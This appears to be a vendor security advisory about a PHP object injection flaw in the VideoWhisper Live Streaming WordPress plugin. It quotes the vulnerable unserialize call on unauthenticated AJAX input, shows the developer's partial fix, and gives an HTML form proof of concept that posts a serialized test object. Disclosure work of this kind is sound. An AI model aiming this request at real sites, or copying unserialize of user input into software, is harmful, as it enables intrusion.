PHP Object Injection Vulnerability in VideoWhisper Live Streaming

Recently we found that the plugin VideoWhisper Live Streaming contained a PHP object injection vulnerability.

The plugin makes the function vwls_calls() available through WordPress’ AJAX functionality whether the requester is logged in to WordPress or not (in the file /videowhisper_streaming.php ):

94
95

add_action( 'wp_ajax_vwls', array('VWliveStreaming','vwls_calls'));
add_action( 'wp_ajax_nopriv_vwls', array('VWliveStreaming','vwls_calls'));

In that function the value of the GET input “task” is used for a switch statement:

6767	switch ($_GET['task'])

As of version 4.67.8, when that is set to “rtmp_status” the value of the POST input “users” is unserialized, which permits PHP object injection to occur:

7962
7963
7964

case 'rtmp_status':
 
	$users = unserialize(stripslashes($_POST['users']));

After we notified the developer they made changes that at least limit the ability to exploit this. Here is the relevant code as version 4.67.12:

case 'rtmp_status':
 
	$options = get_option('VWliveStreamingOptions');
 
	//allow such requests only if feature is enabled (by default is not)
	if ($options['webStatus'] != 'enabled') VWliveStreaming::rexit('denied=webStatusNotEnabled-' . $options['webStatus']);
 
	//allow only status updates from configured server IP
	if ($options['rtmp_restrict_ip'])
	{
		if (VWliveStreaming::get_ip_address() != trim($options['rtmp_restrict_ip'])) VWliveStreaming::rexit('denied=NotFromAllowedIP');
	} else VWliveStreaming::rexit('denied=StatusServerIPnotConfigured');
 
	$userdata = stripslashes($_POST['users']);
 
	if (version_compare(phpversion(), '7.0', '&lt;'))
		$users = unserialize($userdata);  //request is from trusted server
	else $users = unserialize($userdata, false);

Before getting to unserialization, a feature needs to be enabled and the request needs to appear to come from an permitted IP address (there is the possibility that the IP address could be spoofed, but you would need to guess or know the IP address when doing that). For those running at least PHP 7.0, the option to not accept any classes when unserializing should also at least limit PHP object injection from occurring if you could get past the two previous restrictions.

Proof of Concept

With our plugin for testing for PHP object injection installed and activated, the following proof of concept will cause the message “PHP object injection has occurred.” to be shown.

Make sure to replace “[path to WordPress]” with the location of WordPress.

<html>
<body>
<form action="http://[path to WordPress]/wp-admin/admin-ajax.php?task=rtmp_status" method="POST">
<input type="hidden" name="action" value="vwls" />
<input type="hidden" name="users" value='O:20:"php_object_injection":0:{}' />
<input type="submit" value="Submit" />
</form>
</body>
</html>

Timeline

August 30, 2017 – Developer notified.
August 30, 2017 – Version 4.67.9-4.67.11 released, which at least limit exploitation of vulnerability.

Concerned About The Security of the Plugins You Use?

When you are a paying customer of our service, you can suggest/vote for the WordPress plugins you use to receive a security review from us. You can start using the service for free when you sign up now. We also offer security reviews of WordPress plugins as a separate service.

Plugin Vulnerabilities

A service to protect your site against vulnerabilities in WordPress plugins.

PHP Object Injection Vulnerability in VideoWhisper Live Streaming

Proof of Concept

Timeline

Concerned About The Security of the Plugins You Use?